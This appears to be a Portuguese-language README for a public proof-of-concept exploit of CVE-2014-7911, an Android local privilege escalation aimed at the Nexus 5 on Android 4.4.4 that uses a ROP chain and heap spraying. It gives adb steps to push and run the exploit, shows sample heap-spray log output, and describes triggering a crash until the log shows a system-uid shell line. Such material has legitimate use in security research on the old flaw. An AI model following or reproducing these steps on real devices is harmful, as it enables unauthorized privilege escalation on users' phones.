
Exploit de prova de conceito para escalonamento local de privilégios no Android (CVE-2014-7911) visando Nexus5 com cadeia ROP e heap spraying para obter uid de sistema.
POC para CVE-2014-7911 para Nexus5 Android 4.4.4_r1 baseado no retme7, use uma cadeia ROP diferente
conecte seu telefone via adb
adb push jni/expolit /data/local/tmp
adb logcat | grep auo_
execute este POC, clique no botão “CVE-2014-7911”, você verá:
D/auo_CVE20147911(24892): staticAddr = 0x43a1f000
D/auo_CVE20147911(24892): heap sparying... 0
D/auo_CVE20147911(24892): heap sparying... 100
D/auo_CVE20147911(24892): heap sparying... 200
D/auo_CVE20147911(24892): heap sparying... 300
D/auo_CVE20147911(24892): heap sparying... 400
D/auo_CVE20147911(24892): heap sparying... 500
D/auo_CVE20147911(24892): heap sparying... 600
D/auo_CVE20147911(24892): heap sparying... 700
D/auo_CVE20147911(24892): heap sparying... 800
D/auo_CVE20147911(24892): heap sparying... 900
D/auo_CVE20147911(24892): heap sparying... 1000
D/auo_CVE20147911(24892): heap sparying... 1100
D/auo_CVE20147911(24892): heap sparying... 1200
D/auo_CVE20147911(24892): heap sparying... 1300
D/auo_CVE20147911(24892): heap sparying... 1400
D/auo_CVE20147911(24892): heap sparying... 1500
D/auo_CVE20147911(24892): heap sparying... 1600
D/auo_CVE20147911(24892): heap sparying... 1700
D/auo_CVE20147911(24892): heap sparying... 1800
D/auo_CVE20147911(24892): heap sparying... 1900
Em seguida, minimize a atividade várias vezes até que o sistema trave. Se você ver:
D/auo_exploit(22665): uid=1000(system) gid=1000(system)
o exploit teve sucesso. Se o seu telefone apenas travar, seu dispositivo está vulnerável; o exploit pode ter falhado (você deve encontrar cadeias ROP diferentes).